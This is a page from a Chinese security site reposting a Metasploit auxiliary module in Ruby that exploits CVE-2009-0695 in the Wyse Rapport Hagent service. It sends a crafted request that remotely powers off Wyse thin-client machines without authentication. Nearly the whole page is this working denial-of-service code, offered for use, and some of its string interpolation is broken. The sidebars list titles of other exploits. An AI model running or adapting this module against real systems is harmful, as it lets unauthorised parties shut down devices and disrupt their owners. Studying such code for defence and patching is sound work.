首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Wyse Machine Remote Power off (DOS) without any privilege
来源:it.solunium@gmail.com 作者:solunium 发布时间:2012-06-15  

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::Tcp
 include Msf::Auxiliary::Dos

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Wyse Machine Remote Power off (DOS)',
   'Description'    => %q{
     This module exploits the Wyse Rapport Hagent service and cause
                                        remote power cycle (Power off the wyse machine remotely).
   },
   'Stance'         => Msf::Exploit::Stance::Aggressive,
   'Author'         => 'it.solunium@gmail.com',
   'Version'        => '$Revision: 14976 $',
   'References'     =>
    [
     ['CVE', '2009-0695'],
     ['OSVDB', '55839'],
     ['US-CERT-VU', '654545'],
     ['URL', 'http://snosoft.blogspot.com/'],
     ['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
     ['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
     ['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
    ],
   'Privileged'     => true,
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Targets'        =>
    [
     [ 'Wyse Linux x86', {'Platform' => 'linux',}],
    ],
   'DefaultTarget'  => 0,
   'DisclosureDate' => 'Jun 13 2012'
  ))

  register_options(
   [
    Opt::RPORT(80),
   ], self.class)
 end


 def run

  
  # Connect to the target service
  print_status("Connecting to the target #{rhost}:#{rport}")
  if connect
                print_status("Connected...")
                end

  # Parameters

                genmac     = "00"+Rex::Text.rand_text(5).unpack("H*")[0]

  craft_req = '&V52&CI=3|'
                craft_req << 'MAC=#{genmac}|#{rhost}|'
                craft_req << 'RB=0|MT=3|'
                craft_req << '|HS=#{rhost}|PO=#{rport}|'
                craft_req << 'SPO=0|'

                # Send the malicious request
  sock.put(craft_req)

  # Download some response data
  resp = sock.get_once(-1, 10)
  print_status("Received: #{resp}")

                disconnect

  if not resp
   print_error("No reply from the target, this may not be a vulnerable system")
   return
  end

  if resp == '&00'
                print_status("#{rhost} execute command succefuly & power off.")
                return
                end

                #Exeptions
  rescue ::Rex::ConnectionRefused
   print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.")
                rescue ::Rex::HostUnreachable
   print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable")
                rescue  ::Rex::ConnectionTimeout
   print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out")
  rescue ::Errno::ECONNRESET, ::Timeout::Error
   print_status("#{rhost} not responding.")

 end
end

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·XM Easy Personal FTP Server v
·ESRI ArcGIS 10.0.X / ArcMap 9
·Windows 8 Developer Preview DE
·Adobe Illustrator CS5.5 Memory
·Opera 12 Local Arbitrary Downl
·MS12-037 Internet Explorer Sam
·Wyse Machine Remote Power off
·ComSndFTP 1.3.7 Beta USER Buff
·WordPress plugin Foxypress upl
·Lattice Semiconductor PAC-Desi
·CastRipper 2.9.6 BOF (bypass A
·Edimax IC-3030iWn Authenticati
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved